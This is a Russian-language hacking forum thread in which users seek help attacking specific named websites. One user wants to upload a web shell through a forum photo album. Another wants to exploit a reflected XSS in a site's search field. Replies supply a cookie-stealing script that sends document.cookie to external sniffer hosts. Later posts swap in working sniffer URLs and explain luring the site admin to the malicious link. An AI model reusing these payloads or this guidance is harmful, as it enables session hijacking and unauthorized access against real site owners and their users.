Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Здраствуйте.
    Нашол на одном форуме старый альбом.
    http://forum.psihov.net.ua/store/album
    Пробовал залить шелл через картинку, не получается.
    Помогите пж,или подскажыте что можно зделать.
     
  2. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    Code:
    C:\xampp\htdocs\forum\store\album\liders.php
    Какой смысл ломать что-то стоящее на домашнем серве под виндой?
     
  3. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Я учусь основ хакинга, для меня даже ето сломать большая робота.
    Подскажыте что-то пожайлуста.
     
  4. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    Ребят подскажите, есть такой сайт http://www.in-vest-group.ru/component/search/%252F?ordering=&searchphrase=all
    на нем есть уязвимость xss, можно проверить в поле поиск, как дальше куки заполучить? что то не выходит...
     
  5. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    вместо <script>alert()</script> пишеш <script>
    img = new Image(); img.src = "http://ссылка_на_сниф.gif"+document.cookie;
    </script>
     
  6. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    Roston скажи а сниф гиф например какой?
     
  7. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    <script>
    img = new Image(); img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>

    так пойдет? я вписываю это в адресную строку, но ошибка со стороны сервера.
     
  8. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    ага понял тебя, только вот сниффер не писал не когда, мб есть какой нить готовый исходник?
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    А мб есть какой нибудь поисковик в интернете? Или поxуй?
     
  10. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Онлайн вариант по ссылке.

    Link

    Третий результат в гугле по запросу "Сниффер".

    Учиться! Учиться! Учиться!
     
  11. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    или же
    kanicq.ru/sniffer
     
  12. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    Ну что ж, спасибо кто помогал, теперь как я понимаю надо ждать результата в сниффере?
     
  13. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    как проверить прошла атака или нет?
     
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    зайти на снифер,если есть куки значит прошла
     
    _________________________
  15. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    HAXTA4OK куки ведь получаться сразу, или только когда админ сайта зайдет на сайт? просто пока что куков нет...
     
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    когда он зайдет на сайт, вернее на ту странице где xss сработает

    ЗЫ возьми и сам проверь, зайди туда где ты xss прописывал , если придут твои куки значит xss там есть
     
    _________________________
  17. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    HAXTA4OK, понял, вечером проверю логи сниффера, вдруг что нить получиться))
     
    1 person likes this.
  18. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    HAXTA4OK проверил ка4к ты сказал, не пришли, блин. можешь посмотреть что я не так сделал?
     
  19. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    <script>
    img = new Image(); img.src = "http://faiki.hut2.ru/s.gif"+document.cookie;
    </script>

    Вот такой код, в писываю в адрессную строку, в поле поиска появляется img new image();
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    прочел тему твою сначала, тьфу, у тебя пассивная а не активная, для этого тебе надо эту ссылку как то впарить админу что бы он по ней прошел, что мало вероятно

    зы ощущение что ее там вообще нету =\
     
    _________________________
    #9540 HAXTA4OK, 27 Oct 2009
    Last edited: 27 Oct 2009
Thread Status:
Not open for further replies.